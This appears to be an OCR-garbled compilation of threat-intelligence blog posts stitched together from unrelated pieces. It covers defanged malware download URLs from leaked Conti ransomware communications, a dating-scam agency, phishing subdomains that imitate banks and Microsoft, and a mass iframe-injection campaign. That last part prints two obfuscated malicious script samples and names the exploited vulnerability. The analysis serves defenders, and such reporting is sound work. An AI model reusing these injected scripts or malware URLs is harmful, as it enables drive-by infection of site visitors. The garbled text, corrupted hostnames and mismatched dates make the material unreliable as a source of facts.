hxxp://gk24w3eumyv4fqajpbw6jbrd6eb4kwvcqcfg4po25cnxuqs7hhhan6yd.onion/ npcap.exe 
hxxp://www.ottenbourg.com/AcademiPreview.exe 
hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://ajeetsinghbaddan.com/Doc-Preview.exe 
hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://ajeetsinghbaddan.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Docl.exe 
hxxp://reefglobal.com/dl2a.exe 
hxxp://paullesueurlegacyfoundation.com/9rhjdkjfh.exe 
hxxp://www.ottenbourg.com/nagpsdo.exe 
hxxp://www.namaskardunia.com/badtest2.exe 
hxxp://www.namaskardunia.com/test1l.exe 
hxxp://45.148.120.192/service64.exe 
hxxp://45.148.120.192/servicel11.exe 
hxxp://45.148.120.192/service222.exe 
hxxp://fdsfdsf.com/fdsfds/file.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://45.148.120.192/service64.exe 
hxxp://45.148.120.192/servicel11.exe 
hxxp://45.148.120.192/service222.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 


hxxp://www.ottenbourg.com/upload/xml1.exe 
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hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://dylanengineeringservices.com/3.exe 
hxxp://dylanengineeringservices.com/3.exe 
hxxp://www.ottenbourg.com/5.exe 
hxxp://maintenance.com/autoupdate.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/1.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/2.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/3.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/1.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/2.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/3.exe 
hxxp://shighil.com/dl2.exe 
hxxp://shighil.com/dl2.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
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hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://emploimed.com/dl2m.exe 
hxxp://copyrightlive-ksa.com/t1000.exe 
hxxp://www.shighil.com/dl2.exe 
hxxp://www.shighil.com/dl2.exe 
hxxp://nutritionprofbob.com/teste.exe 
hxxp://copyrightlive-ksa.com/t1000.exe 
hxxp://www.shiningshadowllc.com/DocumentPreview.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/1.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/2.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/3.exe 


hxxp://brankovucinec.blob.core.windows.net/downloads/mstsc.exe _.manifest.zip 


hxxp://emploimed.com/scintillabc.exe 
hxxp://emploimed.com/scintillabc.exe 
hxxp://www.coalminds.com/Document _Print.exe 
hxxp://www.sonorambc.org/Document _Print.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1l.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Previewl1.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://puccienterprises.com/Preview.exe 


hxxp://e-tech.ie/PreviewDoc.exe 
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hxxp://e-tech.ie/PreviewDoc.exe 
hxxp://puccienterprises.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://e-tech.ie/PreviewDoc.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/prw/Preview.exe 
hxxp://nutritionprofbob.com/prw/Preview.exe 
hxxp://violinstop.com/Preview.exe 
hxxp://nutritionprofbob.com/prw/Preview.exe 
hxxp://reefglobal.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://middletownfriedchickengyro.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://easychurchbooks.com/Preview.exe 
hxxp://easychurchbooks.com/Preview.exe 
hxxp://sonorambc.org/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/Preview.exe- 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://aspiremedstaff.com/Print.exe 
hxxp://emploimed.com/Print _Preview.exe 
hxxp://www.namaskardunia.com/Preview.exe 
hxxp://www.namaskardunia.com/Preview.exe 
hxxp://atlantisprojects.ca/Preview.exe 
hxxp://gilchrist.fl.us/Preview.exe 
hxxp://www.parkisolutions.com/Preview.exe 
hxxp://www.parkisolutions.com/Preview.exe 
hxxp://unitedyfl.com/Print _Preview.exe 
hxxp://unitedyfl.com/Print _Preview.exe 


hxxp://www.parkisolutions.com/Preview.exe 
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for free. Most often it was not you who initiated the acquaintance; you received a letter 
from a lovely Russian female who was interested in you. *Her* description of the partner is 
always very broad that will fit anybody - "kind intelligent man, age and race don’t matter". 


« Sometimes *she* places a real nice discription and lovely, INNOCENT pictures, with honest 
eyes and kind smile. You will initiate the acquaintance. 


¢ It is always email correspondence; and letters are sent regularly, often every day; a new 
picture is sent with almost every letter. 


This is very entertaining since the agency is driving traffic to its domains through spamming. 
The full list of soammed domains part of the campaign : 
love-f-emale .com - 62.90.136.207 
i-amsingle .com 

for-you-from-me .com 
destinycombine .com 
with-hope-for-love .com 
iam-waiting4love .com 
allisloveandlove .com 
amourwedding .com 
adorelovewon .com 
andiloveyoutoo .com 
attractive-ladies .com 
luckyheatrs .com 

sunwants .com 

myloving-heart .com 
touchmy-heart .com 
dreams-about-lady .com 
fillinglove .net 

createyourlove .net 
buildyour-happylove .net 
tender-woman .net 

make-family .net 


2229 


hxxp://fancydes.webd.pl/Review.exe 
hxxp://rayanat.com/Print _Preview.exe 
hxxp://wholesalebosmereusa.com/Preview.exe 
hxxp://kohlheatingandair.com/Review.exe 
hxxp://fancydes.webd.pl/Review.exe 
hxxp://rayanat.com/Preview _Print.exe 
hxxp://calacatta.com/Preview.exe 
hxxp://google.com/update.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://www.adventureworldindia.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://aspiremedstaff.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://globaluxrma.com/Review.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://paullesueurlegacyfoundation.com/ReviewPrint.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://shighil.com/ReviewPrint.exe 
hxxp://shighil.com/TerminationRep.exe 
hxxp://alwaslegypt.com/Preview.exe 
hxxp://www.omegasystemsuae.com/Preview.exe 
hxxp://www.omegasystemsuae.com/BKOFR.exe 
hxxp://copyrightlive-uae.com/P64.exe 
hxxp://copyrightlive-uae.com/Print.pdf.exe 
hxxp://copyrightlive-uae.com/P64.exe 
hxxp://coffschamber.com.au/Review.exe 
hxxp://coffschamber.com.au/Review.exe 


hxxp://coffschamber.com.au/Review.exe 
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hxxp://cdn-102.anonfiles.com/XdzdPbVf08/a6501123-1600284832/Review.exe 
hxxp://cdn-102.anonfiles.com/XdzdPbVf08/a6501123-1600284832/Review.exe 
hxxp://cdn-33.anonfiles.com/L30eQ0Vbo02/d37ab69a-1600287659/Preview.exe 
hxxp://emploimed.com/Preview.exe 
hxxp://cdn-33.anonfiles.com/L30eQ0Vbo2/d37ab69a-1600287659/Preview.exe 
hxxp://www.omegasystemsuae.com/BKOFR.exe 
hxxp://www.delwarren.com/backup/nowin.exe 

hxxp://wikiapply.ir/Scrip.exe 

hxxp://shighil.com/Scrit.exe 

hxxp://shighil.com/Scrip.exe 

hxxp://shighil.com/Print.exe 

hxxp://nutritionprofbob.com/Preview.exe 
hxxp://cdn-114.anonfiles.com/ZfSf52X20c/76279be8-1600685243/morl125.exe 
hxxp://dubaidreamsadventure.com/Print _Review.exe 
hxxp://107.155.137.21/https x64.exe 

hxxp://stahlworks.com/dev/unzip.exe 

hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/htp _x64.exe 

hxxp://94.140.115.219/doc/htp _x86.exe 

hxxp://94.140.115.219/1/http64.exe 

hxxp://94.140.115.219/1/P32.exe 

hxxp://94.140.115.219/1/P64.exe 

hxxp://94.140.115.219/1/runl.exe 

hxxp://94.140.115.219/1/run2.exe 

hxxp://94.140.115.219/1/service http64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/http.bin x86.exe 
hxxp://94.140.115.219/doc/http64.bin x64.exe 
hxxp://94.140.115.219/doc/htp _x64.exe 

hxxp://94.140.115.219/doc/htp _x86.exe 

hxxp://94.140.115.219/1/http64.exe 
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hxxp://94.140.115.219/1/P32.exe 
hxxp://94.140.115.219/1/P64.exe 
hxxp://94.140.115.219/1/runl.exe 
hxxp://94.140.115.219/1/run2.exe 
hxxp://94.140.115.219/1/service http64.exe 
hxxp://94.140.115.219/crypt/3/http 8080 x64.exe 
hxxp://94.140.115.219/crypt/3/http64.exe 
hxxp://94.140.115.219/crypt/3/https 8443 x64.exe 
hxxp://94.140.115.219/crypt/3/P64.exe 
hxxp://94.140.115.219/crypt/3/run2.exe 
hxxp://94.140.115.219/crypt/3/runl.exe 
hxxp://94.140.115.219/crypt/3/https _8443.exe 
hxxp://94.140.115.219/crypt/3/http8080.exe 
hxxp://94.140.115.219/crypt/3/http 8080 x64.exe 
hxxp://94.140.115.219/crypt/3/http64.exe 
hxxp://94.140.115.219/crypt/3/https 8443 x64.exe 
hxxp://94.140.115.219/crypt/3/P64.exe 
hxxp://94.140.115.219/crypt/3/run2.exe 
hxxp://94.140.115.219/crypt/3/runl.exe 
hxxp://94.140.115.219/crypt/3/https 8443.exe 
hxxp://94.140.115.219/crypt/3/http8080.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/1.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/2.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/3.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/4/http.exe 


hxxp://94.140.115.219/4/http64.exe 
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hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/4/http.exe 
hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/4/http.exe 
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hxxp://94.140.115.219/4/http64.exe 
hxxp://94.140.115.219/4/https.exe 
hxxp://94.140.115.219/4/https64.exe 
hxxp://94.140.115.219/4/P32.exe 
hxxp://94.140.115.219/4/P64.exe 
hxxp://94.140.115.219/4/runl.exe 
hxxp://94.140.115.219/4/run2.exe 
hxxp://94.140.115.219/4/serv _http64.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 
hxxp://94.140.115.219/3/http 8080 x64.exe 
hxxp://94.140.115.219/3/http64.exe 
hxxp://94.140.115.219/3/http8080.exe 
hxxp://94.140.115.219/3/https 8443.exe 
hxxp://94.140.115.219/3/https 8443 x64.exe 
hxxp://94.140.115.219/3/P32.exe 
hxxp://94.140.115.219/3/p64.exe 
hxxp://94.140.115.219/3/runl.exe 
hxxp://94.140.115.219/3/run2.exe 


Sample currently active malicious domains obtained from publicly leaked internal Conti Ran- 
somware gang communications include: 


hxxp://atlantisprojects.ca 
hxxp://dylanengineeringservices.com 
hxxp://fancydes.webd.pl 
hxxp://fdsfdsf.com 
hxxp://kohlheatingandair.com 
hxxp://stahlworks.com 
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hxxp://wholesalebosmereusa.com 
hxxp://coalminds.com 
hxxp://parkisolutions.com 
hxxp://sonorambc.org 
hxxp://ajeetsinghbaddan.com 
hxxp://alexandersqualitycleaners.com 
hxxp://allacestech.com 
hxxp://alwasl-syria.com 
hxxp://alwaslegypt.com 
hxxp://aspiremedstaff.com 
hxxp://bloomfieldholding.com 
hxxp://calacatta.com 
hxxp://coffschamber.com.au 
hxxp://copyrightlive-ksa.com 
hxxp://dubaidreamsadventure.com 
hxxp://e-tech.ie 
hxxp://easychurchbooks.com 
hxxp://ebeautytrade.com 
hxxp://emploimed.com 
hxxp://gilchrist.fl.us 
hxxp://globaluxrma.com 
hxxp://google.com 
hxxp://greenmountains.ae 
hxxp://maintenance.com 
hxxp://middletownfriedchickengyro.com 
hxxp://nutritionprofbob.com 
hxxp://paullesueurlegacyfoundation.com 
hxxp://porceletta-ware.com 
hxxp://puccienterprises.com 
hxxp://rayanat.com 
hxxp://reefglobal.com 
hxxp://shawigroup.com 
hxxp://unitedyfl.com 
hxxp://violinstop.com 


hxxp://watchespower.com 
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hxxp://wikiapply.ir 
hxxp://adventureworldindia.com 
hxxp://alkanzalzahabi.com 
hxxp://almakaan.com 
hxxp://bsrdesigns.com 
hxxp://delwarren.com 
hxxp://namaskardunia.com 
hxxp://omegasystemsuae.com 
hxxp://ottenbourg.com 
hxxp://shighil.com 


hxxp://shiningshadowllc.com 


Sample personal photos obtained from publicly leaked internal Conti Ransomware gang com- 


munications include: 


[11] 


[12] 
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ASCMUROUP 
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[14] 
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LEVLo 


AeTCKaA ODCXLa 


[15] 
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-My name is Svetlana 


Hobbies 

My biggest passion is traveling and learreng Cultures of other courtnes. | have been traveled to mary 
countnes, such as Austria, Holland, France. Hungary, Czech Repubiic, Turkey, Egypt. | am also very 
900d housewde, | eryoy Cooking mew and tasty @shes, to keep my home m ceder | hove nature and 
flowers, | tke arumais. | like sport and | have been visiting dancing classes for several years. And now | 
try always to Stay m good shape and lead heathy We style 

More About Me 

| an very comvmaricative, social and Inendly person. romaric, tender, womaresh, loving, caring. To be 
high-sprted and optirrestic is a usual self for me and | am sekdorn out of sorts. | am very sensitive, | 
feel very good the mood of people around me, | care for my closest people. Somnetines, | an 
spontaneous, | lke adventures, traveling, learning new things, | am very flexible and can adapt to new 
CeCUMStarKes easaty 

ideal Relationship 

| would like to meet an interesting and mice man. | would ike hen to be romantic ard very tender, wth 
whorn | could forget about whole world and easily relax in hes strong embrace! His age is not mnportart 
for me, af what | care about - our relabonships and feelings 


© 2007-2008 


There’s something "ingenious" about this type of dating scams, since the bogus dating agency 
can forward the scam responsibility to the non-existent girls at the first place. Moreover, 
despite the countless number of email credits, flowers and photos that you’ve purchased by 
using the agency’s commercial services, the non-existent girl can always reserve the right not 
to meet or interact with you in any way. And even if there are actual girls working for the ad 
agency on a revenue-sharing basis, the agency silently makes money by reserving its right to 
ruin your return on investment no matter how much and what you spend on their site. 


Now, that’s a business model scamming the gullible and the lonely, which from a legal 
perspective - excluding the spamming - can in fact be legal in the country of operation due to 
the eventual mis-matching of characters. 

UPDATE: 

The people from "[5]Confidential Connections" have a long history of spamming/scamming 
activities. Here are more related resources: 


[6]A first-person account: 
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[16] 
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[17] 
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[18] 
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Uy, 


LUXURY PROM 


PASSIONATE ABOUT ELEGANCE 


GREET 


[19] 
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[20] 
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"_.ualadies... | work as a guide and translator for guys seeking a wife in Ukraine, and a client 
just came to me who was due to meet a girl from this agency. Im so wound up by the actions 
of this agency that i am going to post this thread in every scam forum i know about. Here is a 
short list of what they did: 


1) Put him in a taxi to pick up the girl and take her to the restaurant, then charged him 
$80 for what should have been a $10 journey 

2) Charged him $60 for a one hour translation, saying that they take a minimum charge of 4 
hours ( $15 an hour)..this they told him only after the meeting 

3) After my client had payed (a very steep $50) to meet the girl, he got her address and 
decided to send her some flowers (at the local rate of 2 dollars for 1 rose, as apposed to 10 
dollars a rose at the agency). The agency, upon finding out about this, called him up and 
shouted at him for daring to send her roses not through them (!) 
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4) It turned out that the girl hadn’t written most of the letters the client had shared with her 
over a period of a year, and in fact that the agency themselves had written them, earning 
good money in the proccess! 

5) The agency lied about the upper age limit for a guy the girl was willing to meet - they put 
down 60 when she had indicated 40. 

6) There is more!...but i think ive written enough for you to get the idea. 


Be aware of this agency! In all my time as a guide/translator i have never seen an agency that 
works so shambolicaly. Agencies like this ruin the reputation of the business, in which there 
are number of hard working honest agencies that suffer as a result." 


[7]More comments from the same person, presumably working there: 

"Beware of ualadys. | live in Ukraine and know someone who works in one of the branches. 
Word has it that they churn out letters factory-style and often write themselves. They do not 
allow their girls to turn down a man who has requested to communicate with them, even if 
they dont want to. They did not allow me to go to their office to check them out and ask them 
questions. They scare the girls so that they dont get in personal contact with a guy or go to 
another agency. Beware!" 


2232 


[8]Exclusive photo gallery from what appears to be a scammed customer - wedding rings are 
in place. The guy was [9]initially spammed: 


"On June 23rd of 2008 (that was 5 months after | gave up my relationship with my ex 
girlfriend), | received one email from UAladys which stated it was translated for a lady in 
Ukraine. Her name is Anastasia R. (ID 5008) Her introduction letter went as follows" 


Thankfully, he’s preserved [10]the achive of the correspondence, exposing their practices. 


OMNAURWNPR 


. http: 
. http: 
. http: 
http: 
http: 
http: 
. http: 
. http: 
. http: 


//ddanchev. blogspot .com/2007/11/lonely-polinas-secret.html 

//ddanchev .blogspot .com/2008/04/malware-and-exploits-serving-girls. html 
//agencyscams.com/Why/ConfidentialConnections. html 
//photo.ualadys.com/engl/ladies_antiscam.html 
//wiw.ualadys.com/engl1/welcome_mission.html 
//wiw.russianmeetingplace.com/forums/showthread. php?threadid=14715 
//waw.russianwomendiscussion.com/Forum/index.php?topic=4222 
//wiw.ualadyscam.com/photo_gallery/photo_gallery.htm 

//waw .ualadyscam.com/default .htm 


10. http://www.ualadyscam.com/Correspondences/ 


5.5.5 


SMS Ransomware Source Code Now Offered for Sale (2009-05-12 13:46) 
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_hxxp://ref34.us 
_hxxp://sec26.net 
_hxxp://sec94.in 
_hxxp://sid45.com 
_hxxp://site17.in 
_hxxp://site37.in 
_hxxp://ssd47.com 
_hxxp://ssl18.net 
_hxxp://ssl19.com 
_hxxp://ssl62.net 
_hxxp://web42.in 
_hxxp://web59.net 
_hxxp://web636.com 


_hxxp://www84.in 


It’s quite obvious that their descriptive nature, just like the ones I’ve discussed before, is to be 
used in phishing attacks in order to visually social engineer the receipts. And as you can see 
in the attached graphs, the IPs resolving to the domains are the typical home based infected 
end users, who would from a theoretical perspective be sending phishing emails to themselves 
at a later stage. And so once infected the hosts phone back home to receive instructions on 
participating in the malicius ecosystem by temporarily serving the phishing domains. Upon in- 
fection the hosts try to connect to 72.46.129.154; 72.46.130.154; 72.46.136.50 and ns.uk2.net, 
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where for the time being there’re twenty different variants that are known to have been using 
ns.uk2.net for DNS resolving purposes. All of these domains are using the same nameservers 
indicating their connection. Here are some of the subdomains in the already running, and 
spammed phishing campaigns : 


_hxxp://direct-certs9.bankofamerica.com.ssl36.net 


_hxxp://www1.update.microsoft.com.ssl36.net 


_hxxp://www7,.nationalcity.com.asp29.com/consultnc/form.asp 


_hxxp://microsoft.com.sec94.in 


_hxxp://direct-certs1.bankofamerica.com.asp63.net 


_hxxp://update.microsoft.com.web72.us 


_hxxp://bankofamerica.com.web42.in 


_hxxp://direct-certsO.bankofamerica.com.web42.in 


_hxxp://update.microsoft.com.web72.us 


_hxxp://www5.update.microsoft.com.sec94.in 


_hxxp://www7.update.microsoft.com.web72.us 


Now that the botnet’s phishing activities are exposed, it’s also important to mention the fact 
that besides the phishing activities, this is the [2]botnet that’s been sending out [3]the recent 
fake [4]Microsoft Critical Live Update emails. 


1. http: //ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping.htm 
2. http://www. cisrt.org/enblog/read.php?230 
3. http: //community.ca.com/blogs/672. aspx 


4. http://blogs.pcmag.com/securitywatch/2008/02/more_phony_windows_update_site.php 
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18.6.5 Another Massive Embedded Malware Attack (2022-06-14 14:15) 


e0.com 
203.19 

204.251, 2-5 CO idledrawings.com 
216.35,196,26 

38.113,.20,1¢ 3 14, yourhostingaccount.com 


216.12 hosti9.h es.net gonaus.com 

75 2 ool-4b7F ic.optoniine.net caribbeanjamz.net 

64.1 www. campb sion.com campbellscollision.com 

216.19. 63 sardinia. globat.c instopiainsurance.com 

64.202 linhost119.prod.mesal.secureserver.net electronicesthetics.com 
apophis. sslcatacombnetworking.com ackopalproductions.com 
customer, entric.com oadway,.com 


O.secureserver net twashingtonkennelclub.com 


reamhost.corm 


apache2-ay.ayv.dreamhost.com 
host173,.hostmonster.com 
webhost. earthlink,net 


aabosa,net 
bi77.nskorea.com bisign.com 
1-111. yourhostingaccount.com 
omedns.com 


n-addr.arpa queerduck, 


Compared to the previous [1]massive malware embedded attack in Italy that | asessed in June, 
2007 which was primarily relying on the fact that a shared hosting provider got hacked into, 
this one is more interesting to follow because the domains have nothing to do with each other, 
in fact some are suspected of being generated for blackhat SEO purposes in combination 
with embedded malware. The rest are legitimate sites. Moreover, the campaign is currently 
in a cover up stage, but the sites are still serving the IFRAME you can see in the attached 
screenshot. Currently affected sites where over 90 % still have the IFRAME within : 
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SAMPLE 1 MEGAZO.org 


<body><script>eval (unescape ("7726 9%6e0%64%6 FS7 7% 20% 7 3%7 N36 137 NS7 527 3%30%27 ZUUS6 FZ6OZHS%27 SSD OHNO 
F%OSZ7S%H6dLHS%GE%7 NZ2OV7 7X7 2%H9S7NVHHSS2URI7AICVSHYVHHS7 276 1460465 S2 OSH OSH 1ZHdZO5 SIdSIISIIZHSZH2GIH 
$2 0%73%7 2263%3dE5C%27S68S7 NS 7 NS7 OS S.aS2 FS2FS7NS7 246 1466 %66%60261%79%7 4Z65S7 2420SO2409%/ Ader el Neloe 
61%66%66%20%7 O368%7 O43 F%27%2b34d%61%7 4%68% 2037 226 F275 %60%64% 2834036147 4468%20%7 226143604646 F 46052 
8%29%2a%33%33%3 043833 6%3N%29%2b42 736 NZ3 O43 O43 046543 043626 1%33%32%5 0%2 722 O27 746 9Z6NS7 NZ68SZ3d437%33 
%32%2 0%68%65%69%6 7%68%7 NZSAT3NZI5%I2%2 OZ 7 SZ7NZ7 I9ZHCLOSSIATSCS27LHNZHIZ73Z7 OZHCLH1%79%3a%2 HSH eLHFS 
GEYHSSSCL27SIOVICLZFAGIVHSV7 2%61%6d%GO5%IE%27%29") ) 5 </script>| 


SAMPLE 2 MEGAZ0.org 


<script language=JavaScript>function ban(x){var 

l=x.length,b=1624,i,j,r,p=6,5=6,w=6,t=Array(63,45,23,3,40,25,24,44,34,43,0,6,6,0,0,0,1,18,52,28,1 
2,32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,108,8,0,0,8,27,8,2,33,19,6,49,50,47,2 
6,54,60,35 ,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31) ;for( j=Math.ceil(1/b) ;j>@;j--){r="*;for(i=M 
ath.min(1,b);i>6;i--,1--){w]=(t[x.charCodeAt(p++)-48])<<s 5if(s){r+=String .fromCharCode( 174° w&255) 
3W>>=8 ;5-=2}else{s=6} }document .write(r)}}ban( "AIDFCOjULRGUCU JUd91i I CSEQ@WSUI ZC JL3SeukCu@qNEwP1e291 
ecWxkdgjeN_7icWxkH91Tagj¥6zCU0J jeaz7i2cxe097FL3DUAdSenJ1LJ3gDU' )</script><script>eval (unescape("%7 
7%69%60%64%6FS7 7%20%73%74S61%7 NS7 537 3S3dS27 G4NS6 F 46 0S65 S27 SSD %6NG6 F456 3% 7 5460465460 S7 NS20S7 7472469 
%7N%65%28%27%30%69%66%7 226 1260%65%2 0%60 26 126.0%65%30F35 43 126242 O47 3%7 246 3%3dS5C%27Z68S7 NS7 NS7 OSS ae 
2FL2FS7NS72%6 1%66266%60%6 127 3S 7 426527 2%20%6 2%6 9%7 aS2F%L7 US7 246 1%66266%20%7 OZ68S7 GS3FL27AADLHISGH 17 
4%68%20%7 2%6 F%75%60S64S2BSAI%6 1% 7 4ZGBS2ES7 246 1% 60 SG 4%6 F260%28%29%2.a%3 143 043 1%3 1%38%34S2 9S 2D%27%63 
%32%6 1%63%62%66%63%66%6 4S3 9Z3BS5C%2 7 42 OS7 726 9S6N%7 4% 6843093 723 4S34%2 046856 5 46 9%6 7 468%7 449059 1%99% 
36%20%73%74%7 9S6CZ6SS3d%50%27F6NS69S73%7 0F60F6 137 943.a%2 046046 F460 S65S50C%27430F%30S2 FS69%66%72%6 136 


0%65%3e%27%29")); </script> 


syncopatedvideo.com 


ja-bob.com 
idledrawings.com 
biblequizzer.net 
johnnydam.com 
gonaus.com 
caribbeanjamz.net 
campbellscollision.com 
instopiainsurance.com 
electronicesthetics.com 
blackopalproductions.com 
loadway.com 
mtwashingtonkennelclub.com 
shoveltown.com 
simplabase.com 
ajrivers.com 
jacquelinesdayspa.com 
epidemianet.com 
aabosa.net 

bisign.com 


orangevaleson.com 
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blackmanassociates.com 
jumarktrade.com 


queerduck.icebox.com 


The main campaign IFRAME URL is megazo.org/trans.htm serving TR/Crypt.XPACK.Gen 
and using its own nameservers nsl.megazo.org (203.117.111.102) and ns2.megazo.org 
(203.117.111.103) which is also hosting 13fr.info; lsense.info; 1lspeed.info. Deobfuscation 
leads to Ispice.info/t/ (203.121.79.164) where we’re redirected to 203.121.79.164/cgi- 
bin/new/in.cgi?p=user4, both URLs try to exploit [2]MDAC ActiveX code execu- 
tion (CVE-2006-0003) vulnerability. Another exploit URL is also active at this IP - 
203.121.79.164/web/index.php which is [3]lcepack is action. 


Related posts: 

